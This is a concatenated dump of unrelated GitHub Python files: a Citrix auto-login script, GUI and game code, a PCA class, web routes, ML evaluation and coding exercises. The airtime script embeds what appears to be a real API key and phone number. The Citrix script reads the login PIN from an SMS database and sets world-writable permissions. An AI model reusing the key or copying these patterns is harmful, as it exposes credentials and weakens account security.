Авторизация')\n citrix_login = config.get('CITRIX_AUTH', 'login')\n citrix_pass = config.get('CITRIX_AUTH', 'password')\n citrix_keyword = config.get('CITRIX_AUTH', 'key_word')\n if web_ops.login_citrix(ctx, citrix_login, citrix_pass, citrix_keyword):\n stage_result()\n else:\n stage_result(False)\n exit()\n logging.info('Этап: Поиск пин-кода для CITRIX')\n now = datetime.datetime.now()\n current_datetime = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n msg_db = config.get('MSG_DB', 'file')\n ctx_number = config.get('CITRIX', 'mobile_number')\n code = message_ops.citrix_pin(msg_db, ctx_number, current_datetime)\n logging.debug('Получен пин-код от Citrix: {}'.format(code))\n logging.info('Этап: Ввод пин-кода')\n if web_ops.inter_pincode(ctx, code):\n stage_result()\n else:\n stage_result(False)\n exit()\n logging.info('Этап: Имитация мыши, подключение к VDI')\n mouse_work.drill_to_reciever()\n stage_result()\n\n\ndef set_logging():\n \"\"\"\n Настройка логирования\n :return:\n \"\"\"\n log_dir = 'logs'\n log = 'connect.log'\n logfile_name = log_dir + '/' + log\n\n # Проверка на существование папки для логов\n if log_dir not in os.listdir(script_home):\n os.makedirs(log_dir, 0o777)\n\n if log not in os.listdir(log_dir):\n open(logfile_name, 'w').close()\n os.chmod(logfile_name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\ndef stage_result(flag=True):\n \"\"\"\n Логирование результата этапа\n :param flag: Флаг выполнения\n :return: None\n \"\"\"\n if flag:\n logging.info('Готово!')\n else:\n logging.error('Ошибка')\n\n\nif __name__ == '__main__':\n # Расположение Кода\n script_home = os.path.dirname(os.path.abspath(__file__))\n script_home = script_home + '/../'\n os.chdir(script_home)\n\n set_logging()\n logging.config.fileConfig('conf/logging.conf')\n\n logging.info('Выполнен запуск')\n\n # Загрузка конфигурации\n config = configparser.ConfigParser()\n config.read('conf/configuration.ini')\n\n # Запуск основной логики\n try:\n main()\n finally:\n pass\n","repo_name":"elMariachi23/CITRIX_AUTO_CONNECT","sub_path":"bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2721146647","text":"import sys\nfrom ui.DemoWindow import *\nfrom ui.StatsWindow import *\n\n\ndef launch_ui(titles):\n app = QtWidgets.QApplication([])\n main = MainWindow(titles)\n main.show()\n sys.exit(app.exec_())\n\n\nclass MainWindow(QtWidgets.QWidget):\n def __init__(self, titles):\n super().__init__()\n self.__titles = titles\n\n self.__title = QtWidgets.QLabel(\"Pop Daniel Avram - B.Sc. Thesis Demo\",\n alignment=QtCore.Qt.AlignCenter)\n self.__demo_button = QtWidgets.QPushButton(\"Demo\")\n self.__demo_button.clicked.connect(self.__launch_demo_window)\n\n self.__stats_button = QtWidgets.QPushButton(\"Stats\")\n self.__stats_button.clicked.connect(self.__launch_stats_window)\n\n self.layout = QtWidgets.QVBoxLayout(self)\n self.layout.addWidget(self.__title)\n self.layout.addWidget(self.__demo_button)\n self.layout.addWidget(self.__stats_button)\n\n self.__demo_window = DemoWindow(self.__titles)\n self.__stats_window = StatsWindow()\n\n @QtCore.Slot()\n def __launch_demo_window(self):\n self.__demo_window.resize(800, 600)\n self.__demo_window.show()\n\n @QtCore.Slot()\n def __launch_stats_window(self):\n self.__stats_window.resize(800, 600)\n self.__stats_window.show()\n","repo_name":"AvramPop/bachelor-thesis","sub_path":"thesis-project/ui/ui_main.py","file_name":"ui_main.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19712219693","text":"def main_logic():\r\n global shield_range\r\n laser_group.draw(screen)\r\n laser_group.update()\r\n\r\n # giant group of meteors. groups useful for displaying single/multiple sprites on screen\r\n meteor_group.draw(screen)\r\n meteor_group.update() # .update method is from the class so that the position of the sprite change\r\n\r\n spaceship_group.draw(screen) # contains only 1 sprite that's why used GroupSingle\r\n spaceship_group.update()\r\n\r\n # meteor_group.draw(screen)\r\n # meteor_group.update()\r\n\r\n # Collisions\r\n if pygame.sprite.spritecollide(spaceship_group.sprite, meteor_group, True):\r\n mixer.music.load('Goat Scream.mp3')\r\n mixer.music.play(1)\r\n shield_range -= 1\r\n\r\n for beams in laser_group:\r\n if pygame.sprite.spritecollide(beams, meteor_group, True):\r\n beams.kill()","repo_name":"Ali-TM-original/Meteor-game","sub_path":"main_running_function.py","file_name":"main_running_function.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74655665821","text":"import os, sys, logging, warnings, secrets\nfrom IPython.display import display\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import *\nfrom sklearn.decomposition import *\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\n\nfrom sklearn.impute import KNNImputer\n\n\nclass Pca:\n \"\"\"attrs :\n\n X : original X\n X_scaled : standardscale of X\n pca : pca instance\n pcs : components\n variance : vairaince and cumvariance of pcs\n\n \"\"\"\n\n def __init__(\n self,\n _df,\n n_components: int = None,\n id_col=None,\n kernel=False,\n force_nan_impute=True,\n ) -> None:\n \"\"\" \"\"\"\n\n # X\n self.X = _df.copy()\n\n # display(_df)\n\n self.id_column = self.X.loc[:, id_col].values if id_col else self.X.index.values\n X_num = self.X.select_dtypes(include=np.number).copy()\n\n if force_nan_impute:\n X_num = pd.DataFrame(\n KNNImputer().fit_transform(X_num), columns=X_num.columns\n )\n\n self.kernel = kernel\n\n self.n_components = n_components if n_components else X_num.shape[1]\n\n # X_scaled\n X_scaled = pd.DataFrame(\n StandardScaler().fit_transform(X_num), columns=X_num.columns\n )\n self.X_scaled = X_scaled\n\n if not kernel:\n pca = PCA(n_components=self.n_components)\n else:\n pca = KernelPCA(\n n_components=self.n_components, kernel=self.kernel, gamma=10\n )\n\n self.pca = pca\n self.pca.fit(X_scaled)\n\n @property\n def _variance(self):\n # variance :\n variance = self.pca.explained_variance_ratio_\n variance_cum = np.cumsum(self.pca.explained_variance_ratio_)\n\n _variance = pd.DataFrame(\n {\"variance\": variance, \"variance_cum\": variance_cum},\n index=[f\"PC_{i+1}\" for i, _ in enumerate(self.X_proj.columns)],\n )\n\n return _variance.round(2)\n\n @property\n def _pcs(self):\n # pcs\n _pcs = self.pca.components_\n _pcs = pd.DataFrame(\n _pcs, index=self.X_proj.columns, columns=self.X_scaled.columns\n )\n _pcs = _pcs.round(2)\n\n return _pcs\n\n @property\n def X_proj(self):\n X_proj = self.pca.transform(self.X_scaled)\n X_proj = pd.DataFrame(X_proj)\n X_proj.columns = [f\"PC_{i+1}\" for i, _ in enumerate(X_proj.columns)]\n\n return X_proj\n\n def variance(self, display_=True):\n \"\"\" \"\"\"\n\n # TODO USE PLOTLY\n\n # compute\n scree = (self.pca.explained_variance_ratio_ * 100).round(2)\n scree_cum = scree.cumsum().round()\n x_list = range(1, self.n_components + 1)\n\n # display\n if display_:\n plt.bar(x_list, scree)\n plt.plot(x_list, scree_cum, c=\"red\", marker=\"o\")\n plt.xlabel(\"rang de l'axe d'inertie\")\n plt.ylabel(\"pourcentage d'inertie\")\n plt.title(\"Eboulis des valeurs propres\")\n plt.show(block=False)\n\n return self._variance\n\n def pcs(self, fmt: int = 2, size=8, display_: bool = True):\n \"\"\" \"\"\"\n\n # TODO update with plotly\n # no attribute => Function\n # args,\n\n if display_:\n figsize = [int(1.5 * size), size]\n fmt = f\".{fmt}f\"\n fig, ax = plt.subplots(1, 1, figsize=figsize)\n ax = sns.heatmap(\n self._pcs.T, vmin=-1, vmax=1, cmap=\"coolwarm\", fmt=fmt, annot=True\n )\n # fig.show()\n\n return self._pcs.T\n\n def correlation_graph(\n self,\n dim: list = [0, 1],\n ):\n \"\"\"Affiche le graphe des correlations\n\n Positional arguments :\n -----------------------------------\n dim : list ou tuple : le couple x,y des plans à afficher, exemple [0,1] pour F1, F2\n \"\"\"\n\n # TODO ==> USE PX and NOT MATPLOTLIB\n\n # Extrait x et y\n x, y = dim\n\n # features\n features = self.X_scaled.columns\n\n # Taille de l'image (en inches)\n fig, ax = plt.subplots(figsize=(10, 9))\n\n # Pour chaque composante :\n for i in range(0, self.pca.components_.shape[1]):\n # Les flèches\n ax.arrow(\n 0,\n 0,\n self.pca.components_[x, i],\n self.pca.components_[y, i],\n head_width=0.07,\n head_length=0.07,\n width=0.02,\n )\n\n # Les labels\n plt.text(\n self.pca.components_[x, i] + 0.05,\n self.pca.components_[y, i] + 0.05,\n features[i],\n )\n\n # Affichage des lignes horizontales et verticales\n plt.plot([-1, 1], [0, 0], color=\"grey\", ls=\"--\")\n plt.plot([0, 0], [-1, 1], color=\"grey\", ls=\"--\")\n\n # Nom des axes, avec le pourcentage d'inertie expliqué\n plt.xlabel(\n \"F{} ({}%)\".format(\n x + 1, round(100 * self.pca.explained_variance_ratio_[x], 1)\n )\n )\n plt.ylabel(\n \"F{} ({}%)\".format(\n y + 1, round(100 * self.pca.explained_variance_ratio_[y], 1)\n )\n )\n\n # J'ai copié collé le code sans le lire\n plt.title(\"Cercle des corrélations (F{} et F{})\".format(x + 1, y + 1))\n\n # Le cercle\n an = np.linspace(0, 2 * np.pi, 100)\n plt.plot(np.cos(an), np.sin(an)) # Add a unit circle for scale\n\n # Axes et display\n plt.axis(\"equal\")\n plt.show(block=False)\n\n def _2d_factorial_planes(\n self,\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n ):\n # TODO USE PX\n\n x, y = dim\n\n # Initialisation de la figure\n fig, ax = plt.subplots(1, 1, figsize=figsize)\n\n if len(clusters):\n sns.scatterplot(data=None, x=X_[:, x], y=X_[:, y], hue=clusters)\n else:\n sns.scatterplot(data=None, x=X_[:, x], y=X_[:, y])\n\n # Si la variable pca a été fournie, on peut calculer le % de variance de chaque axe\n v1 = str(round(100 * self.pca.explained_variance_ratio_[x])) + \" %\"\n v2 = str(round(100 * self.pca.explained_variance_ratio_[y])) + \" %\"\n\n # Nom des axes, avec le pourcentage d'inertie expliqué\n ax.set_xlabel(f\"F{x+1} {v1}\")\n ax.set_ylabel(f\"F{y+1} {v2}\")\n\n # Valeur x max et y max\n x_max = np.abs(X_[:, x]).max() * 1.1\n y_max = np.abs(X_[:, y]).max() * 1.1\n\n # On borne x et y\n ax.set_xlim(left=-x_max, right=x_max)\n ax.set_ylim(bottom=-y_max, top=y_max)\n\n # Affichage des lignes horizontales et verticales\n plt.plot([-x_max, x_max], [0, 0], color=\"grey\", alpha=0.8)\n plt.plot([0, 0], [-y_max, y_max], color=\"grey\", alpha=0.8)\n\n # Affichage des labels des points\n if len(labels):\n # j'ai copié collé la fonction sans la lire\n for i, (_x, _y) in enumerate(X_[:, [x, y]]):\n plt.text(\n _x, _y + 0.05, labels[i], fontsize=\"14\", ha=\"center\", va=\"center\"\n )\n\n # Titre et display\n plt.title(f\"Projection des individus (sur F{x+1} et F{y+1})\")\n plt.show()\n\n def _3d_factorial_planes(\n self,\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n ):\n \"\"\" \"\"\"\n\n x, y, z = dim\n\n # TOD ADD LABELS AS TEXT\n\n # axis name\n\n v1 = str(round(100 * self.pca.explained_variance_ratio_[x])) + \" %\"\n v2 = str(round(100 * self.pca.explained_variance_ratio_[y])) + \" %\"\n v3 = str(round(100 * self.pca.explained_variance_ratio_[z])) + \" %\"\n vs = [v1, v2, v3]\n axis = [f\"PC_{i+1}\" for i in dim]\n axis = {k: v1 + \"_\" + v2 for k, v1, v2 in zip([\"x\", \"y\", \"z\"], axis, vs)}\n\n if len(clusters):\n # str for better viz\n if isinstance(clusters, pd.Series):\n clusters = clusters.values\n clusters = [str(i) for i in clusters]\n fig = px.scatter_3d(\n x=X_[:, x], y=X_[:, y], z=X_[:, z], color=clusters, labels=axis\n )\n else:\n fig = px.scatter_3d(x=X_[:, x], y=X_[:, y], z=X_[:, z], labels=axis)\n\n # marker size\n fig.update_traces(marker=dict(size=3), selector=dict(mode=\"markers\"))\n\n fig.show()\n\n def factorial_planes(\n self,\n dim: list = [0, 1],\n labels: str = None,\n clusters: str = None,\n alpha: float = 1,\n scale: bool = False,\n scaler: str = \"min\",\n figsize: list = [10, 8],\n marker: str = \".\",\n ):\n \"\"\"\n Affiche la projection des individus\n\n Positional arguments :\n -------------------------------------\n dim : list ou tuple : le couple x,y des plans à afficher, exemple [0,1] pour F1, F2\n\n Optional arguments :\n -------------------------------------\n labels : str, list/tuple : les labels des individus à projeter, default = None\n si str on va chercher la colonne du df, si list on ajoute ex nihilo\n clusters : list ou tuple : la liste des clusters auquel appartient chaque individu, default = None\n si str on va chercher la colonne du df, si list on ajoute ex nihilo\n alpha : float in [0,1] : paramètre de transparence, 0=100% transparent, 1=0% transparent, default = 1\n figsize : list ou tuple : couple width, height qui définit la taille de la figure en inches, default = [10,8]\n marker : str : le type de marker utilisé pour représenter les individus, points croix etc etc, default = \".\"\n \"\"\"\n\n # TODO USE PX\n\n # TO DO IMPLEMENT over scaling for better vise\n\n # Transforme self.X_proj en np.array\n X_ = np.array(self.X_proj)\n\n # On définit la forme de la figure si elle n'a pas été donnée\n if not figsize:\n figsize = (7, 6)\n\n # check LABELS\n\n types = (list, tuple, pd.Series, np.ndarray)\n if isinstance(labels, types): # np.ndarray\n if not len(labels) == len(X_):\n raise AttributeError(\n f\"labels len {len(labels)} and X len {len(self.X)} not len OK\"\n )\n elif labels in [None, \"\", 0, False, []]:\n labels = []\n elif isinstance(labels, str):\n if labels not in self.X.columns:\n raise AttributeError(f\"label {labels} not in X => {self.X.columns}\")\n labels = self.X.loc[:, labels].values\n\n # sanitary check\n try:\n len(labels)\n except Exception as e:\n logging.error(f\"len labels failed : {labels}\")\n raise e\n\n # check CLUSTERS\n\n if isinstance(clusters, types): # np.ndarray\n if not len(clusters) == len(X_):\n raise AttributeError(\n f\"clusters len {len(clusters)} and X len {len(self.X)} not len OK\"\n )\n elif clusters in [None, \"\", 0, False, []]:\n clusters = []\n elif isinstance(clusters, str):\n if clusters not in self.X.columns:\n raise AttributeError(f\"label {clusters} not in X => {self.X.columns}\")\n clusters = self.X.loc[:, clusters].values\n\n # sanitary check\n try:\n len(clusters)\n except Exception as e:\n logging.error(f\"len clusters failed : {clusters}\")\n raise e\n\n # axis 12321 is pb\n if max(dim) >= X_.shape[1]:\n raise AttributeError(\"la variable axis n'est pas bonne\")\n\n if len(dim) == 2:\n self._2d_factorial_planes(\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n )\n\n if len(dim) == 3:\n self._3d_factorial_planes(\n X_,\n dim,\n labels,\n clusters,\n alpha,\n figsize,\n marker,\n )\n","repo_name":"AlexandreGazagnes/gargaml","sub_path":"gargaml/eda/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":12232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22995534075","text":"\"\"\"\r\nCho số nguyên dương N. Mỗi bước thực hiện các phép biến đổi N theo quy tắc sau\r\n\r\nNếu N chẵn thì N = N/2\r\nNếu N lẻ thì N = N*3 + 1\r\nHãy đếm xem có bao nhiêu giá trị xuất hiện cho đến khi N = 1. Tất nhiên nếu ban đầu N = 1 thì chỉ có một giá trị duy nhất.\r\n\r\nVí dụ: N = 3 thì sẽ có 8 giá trị xuất hiện lần lượt là: 3, 10, 5, 16, 8, 4, 2, 1\r\nInput kết thúc khi N = 0.\r\nInput:\r\n1\r\n2\r\n3\r\n0\r\nOutput:\r\n1\r\n2\r\n8\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n while 1:\r\n n=int(input())\r\n if n==0: break\r\n a=[n]\r\n while n>1:\r\n if n%2==0:\r\n n=int(n/2)\r\n a.append(n)\r\n else:\r\n n=n*3+1\r\n a.append(n)\r\n print(len(a))\r\n\r\n","repo_name":"vantuan0128/PYTHON_PTIT","sub_path":"PY02013.py","file_name":"PY02013.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"73879099104","text":"ENG_FRANCAIS = {\n \"Air Quality\": \"Qualité de l'air\",\n \"ALARM\": \"ALARME\",\n \"Alarm\": \"Alarme\",\n \"CALIBRATE\": \"ÉTALONNAGE\",\n \"DANGER\": \"DANGER\",\n \"ENGLISH\": \"FRANÇAIS\",\n \"GOOD\": \"BON\",\n \"HAZARDOUS\": \"RISQUÉ\",\n \"Indoor Air Quality\": \"Qualité de l'air intérieur\",\n \"INVALID\": \"INVALIDE\",\n \"LANGUAGE\": \"LANGUE\",\n \"LOW BATTERY\": \"BATTERIE FAIBLE\",\n \"MODERATE\": \"MODÉRÉ\",\n \"OVERRANGE\": \"MAXIMUM\",\n \"POOR\": \"PAUVRES\",\n \"SENSITIVE\": \"SENSIBLE\",\n \"TEMPERATURE\": \"TEMPÉRATURE\",\n \"UNHEALTHY\": \"MALSAIN\",\n \"V UNHEALTHY\": \"TRÈS MALSAIN\",\n \"WARMUP\": \"PRÉCHAUFFE\",\n \"WARNING\": \"ATTENTION\",\n}\n\n\ndef interpret(enable=True, english_phrase=\"\"):\n \"\"\"Translate an English phrase.\n\n :param bool enable: Enable the translator. Defaults to True.\n :param str english_phrase: English phrase to be interpreted. Defaults to blank.\n \"\"\"\n\n if enable:\n if english_phrase in ENG_FRANCAIS:\n return ENG_FRANCAIS[english_phrase]\n return english_phrase\n","repo_name":"CedarGroveStudios/CircuitPython_AirQualityTools","sub_path":"cedargrove_airqualitytools/translate/english_to_francais.py","file_name":"english_to_francais.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"16571593435","text":"from django.urls import include, path\nfrom . import views\n\nurlpatterns = [\n path('paths/', views.get_paths),\n path('thumbs/', views.get_thumbs),\n path('image//', views.get_image),\n path('image//next', views.get_next_image),\n path('image//previous', views.get_previous_image),\n path('import/', views.add_path),\n path('refresh/', views.refresh_all),\n path('path//refresh/', views.refresh_path),\n path('remove/', views.delete_all),\n path('path//remove', views.delete_path)\n]\n\n","repo_name":"alastairflynn/gallery","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39916782704","text":"\nfrom __future__ import print_function\n\nimport africastalking\n\nclass AIRTIME:\n def __init__(self):\n\t\t\n self.username = \"Zaddyy\"\n self.api_key = \"7e62c3354e8c37df9cc21abb2fee96f5286d7d314cc244ad52c6e508068f1afa\"\n\n \n africastalking.initialize(self.username, self.api_key)\n\n \n self.airtime = africastalking.Airtime\n\n def send(self):\n \n phone_number = '+2348138054685'\n\n \n amount = \"100\"\n currency_code = \"NGN\"\n\n try:\n\t\t\t\n responses = self.airtime.send(phone_number=phone_number, amount=amount, currency_code=currency_code)\n print (responses)\n except Exception as e:\n print (\"Encountered an error while sending airtime:%s\" %str(e))\n\nif __name__ == '__main__':\n AIRTIME().send()","repo_name":"pelzfx/social-media-incentive-app","sub_path":"airtime.py","file_name":"airtime.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21535076527","text":"import os\nfrom flask import Flask, render_template, flash, request, redirect, url_for, send_from_directory, abort\nimport json\nimport glob\nimport re\n\napp = Flask(__name__)\nconf = {}\n\nfor filename in glob.glob('conf/*.json'):\n matches = re.findall('conf/(\\d\\d\\d\\d)\\.json', filename)\n if len(matches) > 0:\n year = matches[0]\n with open(filename) as f:\n conf[year] = json.load(f)\n\nphotos = []\nfor filename in glob.glob('photos/*.JPG'):\n photos.append(\"/\" + filename)\n\ndef valid_id(year, unique_id):\n if year in conf and unique_id in conf[year]:\n return True\n return False\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World! From luke.'\n\n@app.route('/reveal//')\ndef show_user_profile(year_raw, unique_id):\n year = str(year_raw)\n if valid_id(year, unique_id):\n return render_template('{}/reveal.html'.format(year), info=conf[year][unique_id], photos=photos)\n abort(404)\n #return redirect('/')\n\n@app.route('/static/')\ndef send_static(path):\n return send_from_directory('static', path)\n\n\n@app.route('/photos/')\ndef send_photos(path):\n return send_from_directory('photos', path)\n","repo_name":"youngjl1/santa_site","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3994498437","text":"import pandas as pd\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Read in the data as a pandas dataframe\ndef dataImport(filename):\n data = pd.read_excel(filename)\n return data\n\n\n# Normalise the data using a min-max normalisation method\ndef dataNormalisation(dataset):\n statusDropped = dataset.drop(['Status'], axis=1)\n normalised = (statusDropped - statusDropped.min()) / (statusDropped.max() - statusDropped.min())\n return normalised\n\n\n# Split and shuffle the data into x and y for training and testing\ndef dataPreprocessing(dataset):\n # Normalise the numerical data before training, removes the 'Status' column in 'dataNormalisation'\n x_split = dataNormalisation(dataset)\n y_split = dataset['Status']\n\n cv = ShuffleSplit(n_splits=10) # 10 fold Cross-validation initialise\n\n return x_split, y_split, cv\n\n\nif __name__ == '__main__':\n # Preparing data for training\n df = dataImport('clinical_dataset.xlsx')\n x_split, y_split, cv = dataPreprocessing(df)\n\n # ANN classifier with 2 hidden layers of 50 neurons\n ANN_Classifier50 = MLPClassifier(hidden_layer_sizes=(50, 50), activation='logistic', solver='lbfgs', verbose=1,\n tol=0.000000001, random_state=13)\n\n # ANN classifier with 2 hidden layers of 500 neurons\n ANN_Classifier500 = MLPClassifier(hidden_layer_sizes=(500, 500), activation='logistic', solver='lbfgs', verbose=1,\n tol=0.000000001, random_state=13)\n\n # ANN classifier with 2 hidden layers of 100 neurons\n ANN_Classifier1000 = MLPClassifier(hidden_layer_sizes=(1000, 1000), activation='logistic', solver='lbfgs',\n verbose=1,\n tol=0.000000001, random_state=13)\n\n # Calculate the mean accuracy over 10 iterations\n ANN_scores50 = cross_val_score(ANN_Classifier50, x_split, y_split, cv=cv)\n ANN_scores500 = cross_val_score(ANN_Classifier500, x_split, y_split, cv=cv)\n ANN_scores1000 = cross_val_score(ANN_Classifier1000, x_split, y_split, cv=cv)\n\n # Random forest classifier with 20 trees\n RF_classifier20 = RandomForestClassifier(n_estimators=20, min_samples_leaf=5, verbose=1, random_state=13)\n\n # Random forest classifier with 500 trees\n RF_classifier500 = RandomForestClassifier(n_estimators=500, min_samples_leaf=5, verbose=1, random_state=13)\n\n # Random forest classifier with 10000 trees\n RF_classifier10000 = RandomForestClassifier(n_estimators=10000, min_samples_leaf=5, verbose=1, random_state=13)\n\n # Calculate the mean accuracy over 10 iterations\n RF_scores20 = cross_val_score(RF_classifier20, x_split, y_split, cv=cv)\n RF_scores500 = cross_val_score(RF_classifier500, x_split, y_split, cv=cv)\n RF_scores10000 = cross_val_score(RF_classifier10000, x_split, y_split, cv=cv)\n\n # Print the results\n print(\"Mean accuracy for ANN classifier with 50 neurons over 10-fold CV:\", ANN_scores50.mean())\n print(\"Mean accuracy for ANN classifier with 500 neurons over 10-fold CV:\", ANN_scores500.mean())\n print(\"Mean accuracy for ANN classifier with 1000 neurons over 10-fold CV:\", ANN_scores1000.mean())\n print(\"------------------------------------------------------------------------------------------------\")\n print(\"Mean accuracy for random forest classifier with 20 trees over 10-fold CV:\", RF_scores20.mean())\n print(\"Mean accuracy for random forest classifier with 500 trees over 10-fold CV:\", RF_scores500.mean())\n print(\"Mean accuracy for random forest classifier with 10000 trees over 10-fold CV:\", RF_scores10000.mean())\n","repo_name":"AstellJ11/ML-models-for-cancer-detection","sub_path":"model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7352299070","text":"def is_isogram(xword):\n diction = {}\n for i in range(len(xword)):\n if not xword[i] in diction.keys():\n diction[xword[i]] = 1\n else:\n return False\n return True \n\nwords = [\"dermatoglyphics\",\"palindrome\", \"anagram\"]\n\nfor w in words:\n print(is_isogram(w))","repo_name":"JaredTully/C200jttully","sub_path":"Assignment8/isogram.py","file_name":"isogram.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14195815175","text":"# from pudb import set_trace; set_trace()\nfrom typing import List\nfrom bisect import bisect_right\n\n\nclass Solution1:\n def intToRoman(self, num: int) -> str:\n \"\"\"This is not the best solution. I knew it because I have done this\n problem before, and the best solution does NOT look like this. This is\n just a solution. It starts from the left of the number and going to the\n right. For instance, given a number abcd, we first look at a * 1000 and\n see how that number can be represented. Then we move on to b * 100, c *\n 10, and eventually d.\n\n For each value, we look up in the key list to find the biggest key\n that is smaller than the value. We know for sure, that the biggest key\n that is smaller than the value must be used. So we repeatedly add the\n Roamn symbol represented by the key, and remove the key from the value,\n until the value becomes 0.\n\n O(N), 56 ms, 39% ranking.\n \"\"\"\n symbols = {\n 1: 'I',\n 4: 'IV',\n 5: 'V',\n 9: 'IX',\n 10: 'X',\n 40: 'XL',\n 50: 'L',\n 90: 'XC',\n 100: 'C',\n 400: 'CD',\n 500: 'D',\n 900: 'CM',\n 1000: 'M',\n }\n str_num = str(num)\n power = len(str_num) - 1\n res = ''\n key_lst = list(symbols.keys())\n for d in str_num:\n val = int(d) * 10**power\n while val:\n idx = bisect_right(key_lst, val) - 1\n res += symbols[key_lst[idx]]\n val -= key_lst[idx]\n power -= 1\n return res\n\n\nclass Solution2:\n def intToRoman(self, num: int) -> str:\n \"\"\"This is the official good solution. In a sense, Solution1 is actually\n in the ballpark of this solution, but we use bisect to locate which key\n to use for the current value. This is not necessary, because it is\n guaranteed that the key to use will always go from the largest to the\n smallest. So we only need to keep a pointer going from the largest key\n downwards and remove as many keys as possible for each value encountered\n\n This is the third time I have done this problem. I sincerely hope that\n I can remember this solution.\n \"\"\"\n symbols = {\n 1: 'I',\n 4: 'IV',\n 5: 'V',\n 9: 'IX',\n 10: 'X',\n 40: 'XL',\n 50: 'L',\n 90: 'XC',\n 100: 'C',\n 400: 'CD',\n 500: 'D',\n 900: 'CM',\n 1000: 'M',\n }\n res = ''\n key_lst = list(symbols.keys())[::-1]\n i = 0\n while num and i < len(key_lst):\n if num >= key_lst[i]:\n res += symbols[key_lst[i]]\n num -= key_lst[i]\n else:\n i += 1\n return res\n\n\nsol = Solution2()\ntests = [\n (3, 'III'),\n (4, 'IV'),\n (9, 'IX'),\n (58, 'LVIII'),\n (1994, 'MCMXCIV'),\n]\n\nfor i, (num, ans) in enumerate(tests):\n res = sol.intToRoman(num)\n if res == ans:\n print(f'Test {i}: PASS')\n else:\n print(f'Test {i}; Fail. Ans: {ans}, Res: {res}')\n","repo_name":"FanchenBao/leetcode","sub_path":"2021_03_challenge/03_10_2021.py","file_name":"03_10_2021.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"71495721185","text":"from tkinter import *\nfrom typing import *\n\nfrom models import TargetFile, TargetFileOperation\nimport core.impl\nfrom ui.tk.picker import Picker\nfrom ui.tk.variable_watcher import VariableWatcher\n\nclass SelectPanel(Frame):\n def __init__(self, targets: List[TargetFile], shape: Tuple[int, int], *, parent = None, cnf = {}, **kw):\n super().__init__(master=parent, cnf=cnf, **kw)\n self.mode_radios: List[Radiobutton] = []\n self.pickers: List[Picker] = []\n self.mode_int_var = IntVar(master=self)\n self.mode_int_var.set(core.impl.config_impl.current_mode.value)\n if all(target.operation == TargetFileOperation.ignore for target in targets):\n for target in targets:\n target.operation = core.impl.config_impl.default_operation\n self.targets = targets\n for k, v in TargetFileOperation.__members__.items():\n self.mode_radios.append(\n Radiobutton(\n master=self,\n variable=self.mode_int_var,\n value=v.value, \n text=TargetFileOperation.display_of(v)\n )\n )\n self.shape = shape\n self.setup_grid_layout()\n self.mode_int_var.trace(\"w\", VariableWatcher(self.on_var_changed, 0))\n\n\n def setup_grid_layout(self):\n index = 0\n size = (core.impl.config_impl.grid_width, core.impl.config_impl.grid_height)\n y, x = self.shape\n for row in range(y):\n enough = False\n for column in range(x):\n if index < len(self.targets):\n target_file = self.targets[index]\n picker = Picker(target_file, size, parent=self)\n self.pickers.append(picker)\n picker.grid(row=row, column=column)\n index += 1\n else:\n break\n else:\n enough = True\n if not enough:\n row += 1\n break\n else:\n row += 1\n for i in range(len(self.mode_radios)):\n self.mode_radios[i].grid(row=row, column=i)\n\n def on_var_changed(self):\n self.mode = TargetFileOperation.from_int(self.mode_int_var.get())\n \n @property\n def mode(self) -> TargetFileOperation:\n return core.impl.config_impl.current_mode\n \n @mode.setter\n def mode(self, value: TargetFileOperation):\n core.impl.config_impl.current_mode = value\n self.mode_int_var.set(self.mode.value)","repo_name":"DarrenDanielDay/BackupManager","sub_path":"ui/tk/select_panel.py","file_name":"select_panel.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40412767535","text":"import json\nimport requests\nimport pprint\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"-s\",\n action='store_true',\n help=\"post to 